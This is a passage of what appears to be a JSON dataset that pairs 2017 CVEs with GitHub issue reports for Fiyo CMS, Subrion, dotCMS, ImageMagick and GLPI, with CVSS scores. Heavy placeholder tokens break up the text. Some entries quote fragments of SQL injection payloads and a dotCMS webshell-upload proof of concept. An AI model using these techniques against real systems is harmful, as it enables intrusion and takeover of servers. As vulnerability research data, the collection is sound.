  6027. "description": "Many sq linjection in fiyo cms NUMBERTAG In PATHTAG $_POST['id'] has no filters and $_POST['art_title'] just filter the double quote. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. POST PATHTAG HTTP NUMBERTAG Referer: URLTAG id=\" and sleep NUMBERTAG art_title NUMBERTAG In PATHTAG $_POST paraments has some meanless filter. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. POST PATHTAG Referer: URLTAG send=true&name NUMBERTAG or sleep NUMBERTAG or NUMBERTAG email= EMAILTAG APITAG NUMBERTAG In PATHTAG $_GET[cat], $_GET[user], $_GET[level], APITAG are all no filters at all. So we can inject into this SQL statement. Because it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG APITAG Referer: URLTAG NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG APITAG has no filters and they will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. In add category and edit category they are the similar problems. In add article and edit article there are so many paraments have been not filtered. The attack vector is so simple and too many attact vector could be use. 
So I will not write the detail NUMBERTAG In PATHTAG $_GET['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. GET PATHTAG Referer: URLTAG NUMBERTAG In PATHTAG In edit comment component: $_POST[comment], $_POST[name], $_POST[web], $_POST[email], $_POST[status], $_POST[id] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. In enable comment and disable comment component: $_REQUEST['id'] has no filters and it will be inject into SQL APITAG it used the PDO to connect the APITAG Server, we can use stack query to execute any SQL statement. The attack vector is so simple and too many attact vector could be use. So I will not write the detail. Discoverer: Valo & Melody from Chaitin Tech",
  6028. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6029. "severity": "CRITICAL",
  6030. "baseScore": 9.8,
  6031. "impactScore": 5.9,
  6032. "exploitabilityScore": 3.9
  6033. },
  6034. {
  6035. "CVE_ID": "CVE-2017-11444",
  6036. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/479",
  6037. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/479",
  6038. "Repo_new": "intelliants/subrion",
  6039. "Issue_Created_At": "2017-07-02T03:06:57Z",
  6040. "description": "Subrion cms NUMBERTAG sql injection in FILETAG . description Subrion cms NUMBERTAG has a sql injection because $GET details critical code in FILETAG , $GET is passed to APITAG with no checking APITAG APITAG in PATHTAG ERRORTAG There is a APITAG in APITAG it has the code, its purpose is to retrieve a parameter from $GET: ERRORTAG There is a APITAG in APITAG it has the code, its purpose is to call a user function: ERRORTAG There is a APITAG in APITAG it has the code, its purpose is to construct a key value array string from parameter: ERRORTAG At last, self::ITEM_SEARCH_METHOD is referenced to APITAG PATHTAG ), it has the code, its purpose is to execute sql, and $stmt can be controlled as it is constructed from client side data $GET: ERRORTAG So there exists a sql injection vulnerability. POC: get database user via sql injection URLTAG IMAGE: sql1",
  6041. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6042. "severity": "CRITICAL",
  6043. "baseScore": 9.8,
  6044. "impactScore": 5.9,
  6045. "exploitabilityScore": 3.9
  6046. },
  6047. {
  6048. "CVE_ID": "CVE-2017-11445",
  6049. "Issue_Url_old": "https://github.com/intelliants/subrion/issues/480",
  6050. "Issue_Url_new": "https://github.com/intelliants/subrion/issues/480",
  6051. "Repo_new": "intelliants/subrion",
  6052. "Issue_Created_At": "2017-07-02T03:34:12Z",
  6053. "description": "Subrion cms NUMBERTAG sql injection in FILETAG . Subrion cms NUMBERTAG sql injection in FILETAG description Subrion cms NUMBERTAG has a sql injection because $GET details critical code in FILETAG , $POST is passed to APITAG with no checking ERRORTAG APITAG in PATHTAG ERRORTAG There is a checking APITAG it means that anonymous user will be blocked as \"return false\", but any registered user will continue. So APITAG will be passed to row, and it is from $_POST FILETAG sleep NUMBERTAG url: FILETAG postdata: action=delete APITAG APITAG username&file NUMBERTAG time echo: FILETAG Credit: APITAG of APITAG",
  6054. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6055. "severity": "CRITICAL",
  6056. "baseScore": 9.8,
  6057. "impactScore": 5.9,
  6058. "exploitabilityScore": 3.9
  6059. },
  6060. {
  6061. "CVE_ID": "CVE-2017-11446",
  6062. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/537",
  6063. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/537",
  6064. "Repo_new": "imagemagick/imagemagick",
  6065. "Issue_Created_At": "2017-07-04T15:25:07Z",
  6066. "description": "endless loop in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG in the while loop, only two condition can cause loop exit NUMBERTAG APITAG != EOF' is false this statement will never be false, because APITAG must be NUMBERTAG or NUMBERTAG never be NUMBERTAG EOF NUMBERTAG if NUMBERTAG ff) && (y NUMBERTAG is true this statement will never be true, because small crafted file will cause: a) APITAG to set NUMBERTAG and b) APITAG to set y NUMBERTAG So a crafted will cause endless loop. testcase: URLTAG Credit: APITAG of Venustech",
  6067. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6068. "severity": "MEDIUM",
  6069. "baseScore": 6.5,
  6070. "impactScore": 3.6,
  6071. "exploitabilityScore": 2.8
  6072. },
  6073. {
  6074. "CVE_ID": "CVE-2017-11447",
  6075. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/556",
  6076. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/556",
  6077. "Repo_new": "imagemagick/imagemagick",
  6078. "Issue_Created_At": "2017-07-09T21:57:23Z",
  6079. "description": "Comment about commit URLTAG Could you comment and give a statement about security about this commit ?",
  6080. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6081. "severity": "MEDIUM",
  6082. "baseScore": 6.5,
  6083. "impactScore": 3.6,
  6084. "exploitabilityScore": 2.8
  6085. },
  6086. {
  6087. "CVE_ID": "CVE-2017-11466",
  6088. "Issue_Url_old": "https://github.com/dotCMS/core/issues/12131",
  6089. "Issue_Url_new": "https://github.com/dotcms/core/issues/12131",
  6090. "Repo_new": "dotcms/core",
  6091. "Issue_Created_At": "2017-07-18T01:34:17Z",
  6092. "description": "APITAG /servlets/ajax_file_upload Arbitrary File Upload Vulnerability. ========================== Advisory: APITAG /servlets/ajax_file_upload Arbitrary File Upload Vulnerability Author: M3 MENTIONTAG From APITAG Security Lab Affected Version NUMBERTAG the latest version ========================== Vulnerability Description ========================== Recetly, I found an Arbitrary File Upload Vulnerability in APITAG program, APITAG is widely used in many companies. Vulnerable cgi: PATHTAG private void APITAG session, APITAG request, APITAG response) throws ERRORTAG { String APITAG = null; APITAG listener = null; try { String APITAG = \"\"; listener = new APITAG APITAG factory = new APITAG APITAG = APITAG Enumeration params = APITAG APITAG + APITAG APITAG APITAG upload = new APITAG List items = APITAG boolean ERRORTAG = false; APITAG = false; String APITAG = null; if APITAG { APITAG = APITAG User user = APITAG if APITAG || APITAG { throw new APITAG not upload File. Invalid User\"); } } else { throw new APITAG not upload File. Invalid User\"); } for APITAG i = APITAG APITAG { APITAG APITAG = APITAG if APITAG { if APITAG NUMBERTAG L) { APITAG = true; } if APITAG { APITAG = APITAG APITAG NUMBERTAG else { APITAG = APITAG } APITAG = APITAG File APITAG = new APITAG + APITAG + APITAG + APITAG + APITAG if APITAG { throw new ERRORTAG APITAG or Path\"); } if APITAG { APITAG } File dest = new APITAG + APITAG + APITAG if APITAG { APITAG } APITAG APITAG } } if APITAG { APITAG = \"\"; } if ERRORTAG { APITAG null); } else { APITAG APITAG not process uploaded file. Please see log for details.\"); } } catch ERRORTAG e) { APITAG APITAG + APITAG APITAG APITAG APITAG APITAG } } APITAG can be controlled through paramter APITAG the upload data is not filtered and the uploaded path can be user defined\uff0cso attacker with the administrator authority can upload evil jsp webshell file to control the whole web site or even the web server. 
========================== POC && EXP NUMBERTAG Login as administrator NUMBERTAG POST PATHTAG HTTP NUMBERTAG Host: APITAG Accept Encoding: gzip, deflate Content Type: multipart/form data; boundary NUMBERTAG Cookie: your own cookies Connection: close Content Length NUMBERTAG Content Disposition: form data; name=\"xxx\"; APITAG APITAG NUMBERTAG shell is : FILETAG Attension: In some other cases: APITAG , then shell will be in PATHTAG like this: FILETAG , APITAG is your userid, even if you do not know your userid, you can bruteforce the number behind ' APITAG .",
  6093. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
  6094. "severity": "HIGH",
  6095. "baseScore": 7.2,
  6096. "impactScore": 5.9,
  6097. "exploitabilityScore": 1.2
  6098. },
  6099. {
  6100. "CVE_ID": "CVE-2017-11474",
  6101. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2475",
  6102. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2475",
  6103. "Repo_new": "glpi-project/glpi",
  6104. "Issue_Created_At": "2017-07-18T06:22:47Z",
  6105. "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have sent the details of \"SQL injection in APITAG to your email. Please check.",
  6106. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  6107. "severity": "CRITICAL",
  6108. "baseScore": 9.8,
  6109. "impactScore": 5.9,
  6110. "exploitabilityScore": 3.9
  6111. },
  6112. {
  6113. "CVE_ID": "CVE-2017-11475",
  6114. "Issue_Url_old": "https://github.com/glpi-project/glpi/issues/2476",
  6115. "Issue_Url_new": "https://github.com/glpi-project/glpi/issues/2476",
  6116. "Repo_new": "glpi-project/glpi",
  6117. "Issue_Created_At": "2017-07-18T07:40:16Z",
  6118. "description": "NUMBERTAG SQL injection in FILETAG . ji. EMAILTAG .cn I have sent the details of \"SQL injection in APITAG to your email. Please check.",
  6119. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  6120. "severity": "HIGH",
  6121. "baseScore": 8.8,
  6122. "impactScore": 5.9,
  6123. "exploitabilityScore": 2.8
  6124. },
  6125. {
  6126. "CVE_ID": "CVE-2017-11478",
  6127. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/528",
  6128. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/528",
  6129. "Repo_new": "imagemagick/imagemagick",
  6130. "Issue_Created_At": "2017-06-24T15:03:00Z",
  6131. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG a crafted file will cause this loop endless. testcase: URLTAG Credit: APITAG of Venustech",
  6132. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6133. "severity": "MEDIUM",
  6134. "baseScore": 6.5,
  6135. "impactScore": 3.6,
  6136. "exploitabilityScore": 2.8
  6137. },
  6138. {
  6139. "CVE_ID": "CVE-2017-11501",
  6140. "Issue_Url_old": "https://github.com/NixOS/nixpkgs/issues/27506",
  6141. "Issue_Url_new": "https://github.com/nixos/nixpkgs/issues/27506",
  6142. "Repo_new": "nixos/nixpkgs",
  6143. "Issue_Created_At": "2017-07-19T19:34:44Z",
  6144. "description": "Enabling TLS in APITAG disables peer checking. If someone enables TLS in APITAG our module turns off TLS peer checking. This must not be the default behavior, and should be changed ASAP. Not sure if we can apply this to stable or not. URLTAG or pinned for time: URLTAG",
  6145. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:N/I:H/A:N",
  6146. "severity": "MEDIUM",
  6147. "baseScore": 5.9,
  6148. "impactScore": 3.6,
  6149. "exploitabilityScore": 2.2
  6150. },
  6151. {
  6152. "CVE_ID": "CVE-2017-11505",
  6153. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/526",
  6154. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/526",
  6155. "Repo_new": "imagemagick/imagemagick",
  6156. "Issue_Created_At": "2017-06-24T14:52:00Z",
  6157. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG length can be controlled as follow: APITAG length is NUMBERTAG bit, so the loop can be very large, and cause a lot of failed I/O testcase: URLTAG Credit: APITAG of Venustech",
  6158. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6159. "severity": "MEDIUM",
  6160. "baseScore": 6.5,
  6161. "impactScore": 3.6,
  6162. "exploitabilityScore": 2.8
  6163. },
  6164. {
  6165. "CVE_ID": "CVE-2017-11522",
  6166. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/586",
  6167. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/586",
  6168. "Repo_new": "imagemagick/imagemagick",
  6169. "Issue_Created_At": "2017-07-18T18:31:46Z",
  6170. "description": "Null Point reference in APITAG Crash Link : URLTAG Trigger Command : ./magick convert APITAG output.mng Crash Detail : ERRORTAG",
  6171. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6172. "severity": "MEDIUM",
  6173. "baseScore": 6.5,
  6174. "impactScore": 3.6,
  6175. "exploitabilityScore": 2.8
  6176. },
  6177. {
  6178. "CVE_ID": "CVE-2017-11523",
  6179. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/591",
  6180. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/591",
  6181. "Repo_new": "imagemagick/imagemagick",
  6182. "Issue_Created_At": "2017-07-19T15:25:18Z",
  6183. "description": "endless loop in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick convert cpu APITAG FILETAG Here is the critical code ERRORTAG If text image file only contains APITAG line, it will cause APITAG to infinite loop. testcase: URLTAG Credit: APITAG of Venustech",
  6184. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6185. "severity": "MEDIUM",
  6186. "baseScore": 6.5,
  6187. "impactScore": 3.6,
  6188. "exploitabilityScore": 2.8
  6189. },
  6190. {
  6191. "CVE_ID": "CVE-2017-11524",
  6192. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/506",
  6193. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/506",
  6194. "Repo_new": "imagemagick/imagemagick",
  6195. "Issue_Created_At": "2017-06-04T10:19:05Z",
  6196. "description": "assertion failed in APITAG On version: APITAG NUMBERTAG a crafted file revealed an assertion failure in blob.c. CODETAG testcase : URLTAG Credit : APITAG of Venustech",
  6197. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6198. "severity": "MEDIUM",
  6199. "baseScore": 6.5,
  6200. "impactScore": 3.6,
  6201. "exploitabilityScore": 2.8
  6202. },
  6203. {
  6204. "CVE_ID": "CVE-2017-11525",
  6205. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/519",
  6206. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/519",
  6207. "Repo_new": "imagemagick/imagemagick",
  6208. "Issue_Created_At": "2017-06-23T11:55:45Z",
  6209. "description": "memory exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE When identify CIN file that contains User defined data, imagemagick will allocate memory to store the data in function APITAG in coders\\inc.c Here is the critical code: ERRORTAG APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is in line NUMBERTAG so IM can not control the memory usage ERRORTAG Here is my FILETAG to limit memory usage APITAG And here is my real memory usage: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
  6210. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6211. "severity": "MEDIUM",
  6212. "baseScore": 6.5,
  6213. "impactScore": 3.6,
  6214. "exploitabilityScore": 2.8
  6215. },
  6216. {
  6217. "CVE_ID": "CVE-2017-11526",
  6218. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/527",
  6219. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/527",
  6220. "Repo_new": "imagemagick/imagemagick",
  6221. "Issue_Created_At": "2017-06-24T14:55:35Z",
  6222. "description": "CPU exhaustion in APITAG Version: APITAG NUMBERTAG Q NUMBERTAG magick identify $FILE Here is the critical code ERRORTAG length can be controlled as follow: APITAG length is NUMBERTAG bit, so the loop can be very large, and cause a lot of failed I/O testcase: URLTAG Credit: APITAG of Venustech",
  6223. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6224. "severity": "MEDIUM",
  6225. "baseScore": 6.5,
  6226. "impactScore": 3.6,
  6227. "exploitabilityScore": 2.8
  6228. },
  6229. {
  6230. "CVE_ID": "CVE-2017-11527",
  6231. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/523",
  6232. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/523",
  6233. "Repo_new": "imagemagick/imagemagick",
  6234. "Issue_Created_At": "2017-06-24T08:40:41Z",
  6235. "description": "memory exhaustion in APITAG in dpx.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify DPX file that contains user header data, imagemagick will allocate memory to store the data in function APITAG in coders\\dpx.c Here is the critical code: ERRORTAG APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is in line NUMBERTAG so IM can not control the memory usage ERRORTAG Here is my FILETAG to limit memory usage APITAG And here is the monitor of real memory usage from IM starting to IM ending NUMBERTAG MB limit can be bypassed: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
  6236. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6237. "severity": "MEDIUM",
  6238. "baseScore": 6.5,
  6239. "impactScore": 3.6,
  6240. "exploitabilityScore": 2.8
  6241. },
  6242. {
  6243. "CVE_ID": "CVE-2017-11528",
  6244. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/522",
  6245. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/522",
  6246. "Repo_new": "imagemagick/imagemagick",
  6247. "Issue_Created_At": "2017-06-24T07:54:37Z",
  6248. "description": "memory leak in APITAG in dib.c. Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in dib.c allows attackers to cause a denial of service (memory leak) via a small crafted dib file. ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
  6249. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6250. "severity": "MEDIUM",
  6251. "baseScore": 6.5,
  6252. "impactScore": 3.6,
  6253. "exploitabilityScore": 2.8
  6254. },
  6255. {
  6256. "CVE_ID": "CVE-2017-11529",
  6257. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/525",
  6258. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/525",
  6259. "Repo_new": "imagemagick/imagemagick",
  6260. "Issue_Created_At": "2017-06-24T14:17:50Z",
  6261. "description": "memory leak in APITAG in mat.c. Version: APITAG NUMBERTAG Q NUMBERTAG The APITAG function in mat.c allows attackers to cause a denial of service (memory leak) via a small crafted mat file. ERRORTAG testcase: URLTAG Credit: APITAG of Venustech",
  6262. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6263. "severity": "MEDIUM",
  6264. "baseScore": 6.5,
  6265. "impactScore": 3.6,
  6266. "exploitabilityScore": 2.8
  6267. },
  6268. {
  6269. "CVE_ID": "CVE-2017-11530",
  6270. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/524",
  6271. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/524",
  6272. "Repo_new": "imagemagick/imagemagick",
  6273. "Issue_Created_At": "2017-06-24T09:13:22Z",
  6274. "description": "memory exhaustion in APITAG in ept.c. Version: APITAG NUMBERTAG Q NUMBERTAG APITAG When identify EPT file , imagemagick will allocate memory to store the data. Here is the critical code: ERRORTAG APITAG and APITAG can be controlled as follow: APITAG There is a security checking in the function APITAG but it is not used in this function, so IM can not control the memory usage Here is my FILETAG to limit memory usage APITAG And here is the monitor of real memory usage from IM starting to IM ending NUMBERTAG MB limit can be bypassed: CODETAG testcase: URLTAG Credit: APITAG of Venustech",
  6275. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6276. "severity": "MEDIUM",
  6277. "baseScore": 6.5,
  6278. "impactScore": 3.6,
  6279. "exploitabilityScore": 2.8
  6280. },
  6281. {
  6282. "CVE_ID": "CVE-2017-11531",
  6283. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/566",
  6284. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/566",
  6285. "Repo_new": "imagemagick/imagemagick",
  6286. "Issue_Created_At": "2017-07-16T18:36:27Z",
  6287. "description": "Memory Leak in APITAG coders/histogram.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory APITAG APITAG Leak Detail : ERRORTAG",
  6288. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6289. "severity": "MEDIUM",
  6290. "baseScore": 6.5,
  6291. "impactScore": 3.6,
  6292. "exploitabilityScore": 2.8
  6293. },
  6294. {
  6295. "CVE_ID": "CVE-2017-11532",
  6296. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/563",
  6297. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/563",
  6298. "Repo_new": "imagemagick/imagemagick",
  6299. "Issue_Created_At": "2017-07-16T15:36:17Z",
  6300. "description": "Memory Leak in APITAG Memory Leak Sample Link : URLTAG Trigger Command : ./magick convert APITAG output.mpc Leak Detail : ERRORTAG",
  6301. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6302. "severity": "MEDIUM",
  6303. "baseScore": 6.5,
  6304. "impactScore": 3.6,
  6305. "exploitabilityScore": 2.8
  6306. },
  6307. {
  6308. "CVE_ID": "CVE-2017-11533",
  6309. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/562",
  6310. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/562",
  6311. "Repo_new": "imagemagick/imagemagick",
  6312. "Issue_Created_At": "2017-07-16T13:53:44Z",
  6313. "description": "heap overflow in APITAG Crash Link : FILETAG Trigger Command : ./magick convert heap buffer overflow READ APITAG output.uil Crash Information : PATHTAG ./magick convert PATHTAG output.uil APITAG NUMBERTAG ERROR: APITAG heap buffer overflow on address NUMBERTAG d NUMBERTAG cbdc at pc NUMBERTAG f NUMBERTAG c NUMBERTAG d bp NUMBERTAG fff1b NUMBERTAG b0 sp NUMBERTAG fff1b NUMBERTAG a0 READ of size NUMBERTAG at NUMBERTAG d NUMBERTAG cbdc thread T NUMBERTAG f NUMBERTAG c NUMBERTAG c in APITAG APITAG NUMBERTAG f NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a9a3eb in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG NUMBERTAG in _start ( PATHTAG NUMBERTAG d NUMBERTAG cbdc is located NUMBERTAG bytes to the right of NUMBERTAG byte region APITAG allocated by thread T0 here NUMBERTAG f NUMBERTAG ee NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG eb NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG eb9d5 in APITAG APITAG NUMBERTAG f NUMBERTAG c2f0 in APITAG APITAG NUMBERTAG f NUMBERTAG c6 in APITAG APITAG NUMBERTAG f NUMBERTAG e NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG a9a3eb in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f1 in APITAG APITAG NUMBERTAG d2 in main APITAG NUMBERTAG f NUMBERTAG f in __libc_start_main ( PATHTAG ) SUMMARY: APITAG heap buffer overflow APITAG APITAG Shadow bytes around the buggy address NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb NUMBERTAG fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9a0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9b0: fa fa fa fa fa fa 
fa fa fa fa fa fa fa fa fa fa NUMBERTAG c5a7fffb9c0: fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa fa Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Heap right redzone: fb Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack partial redzone: f4 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe NUMBERTAG ABORTING",
  6314. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6315. "severity": "MEDIUM",
  6316. "baseScore": 6.5,
  6317. "impactScore": 3.6,
  6318. "exploitabilityScore": 2.8
  6319. },
  6320. {
  6321. "CVE_ID": "CVE-2017-11534",
  6322. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/564",
  6323. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/564",
  6324. "Repo_new": "imagemagick/imagemagick",
  6325. "Issue_Created_At": "2017-07-16T18:31:52Z",
  6326. "description": "Memory Leak in APITAG coders/wmf.c. Memory Leak File Link : URLTAG Trigger Command : ./magick convert memory leak_output_art_lite_font_map output.art Leak Detail : PATHTAG ./magick convert APITAG Leak NUMBERTAG output_art NUMBERTAG output.art ERROR: player.c NUMBERTAG libwmf: wmf with bizarre record size; bailing... ERROR: player.c NUMBERTAG please send it to us at FILETAG maximum record size NUMBERTAG record size NUMBERTAG convert: APITAG ERRORTAG APITAG @ PATHTAG convert: APITAG ERRORTAG APITAG @ PATHTAG APITAG NUMBERTAG ERROR: APITAG detected memory leaks Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG b NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d5 in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG d NUMBERTAG in APITAG APITAG NUMBERTAG f NUMBERTAG b NUMBERTAG b in APITAG APITAG NUMBERTAG f NUMBERTAG bbc NUMBERTAG dd in lite_font_map APITAG NUMBERTAG f NUMBERTAG a NUMBERTAG b NUMBERTAG PATHTAG ) Direct leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG in malloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG b9 ( PATHTAG ) Indirect leak of NUMBERTAG byte(s) in NUMBERTAG object(s) allocated from NUMBERTAG f NUMBERTAG c NUMBERTAG d NUMBERTAG a in __interceptor_calloc ( PATHTAG NUMBERTAG f NUMBERTAG c NUMBERTAG c8 ( PATHTAG ) SUMMARY: APITAG NUMBERTAG byte(s) leaked in NUMBERTAG allocation(s).",
  6327. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  6328. "severity": "MEDIUM",
  6329. "baseScore": 6.5,
  6330. "impactScore": 3.6,
  6331. "exploitabilityScore": 2.8
  6332. },
  6333. {
  6334. "CVE_ID": "CVE-2017-11535",
  6335. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/561",
  6336. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/561",
  6337. "Repo_new": "imagemagick/imagemagick",
  6338. "Issue_Created_At": "2017-07-16T13:52:32Z",
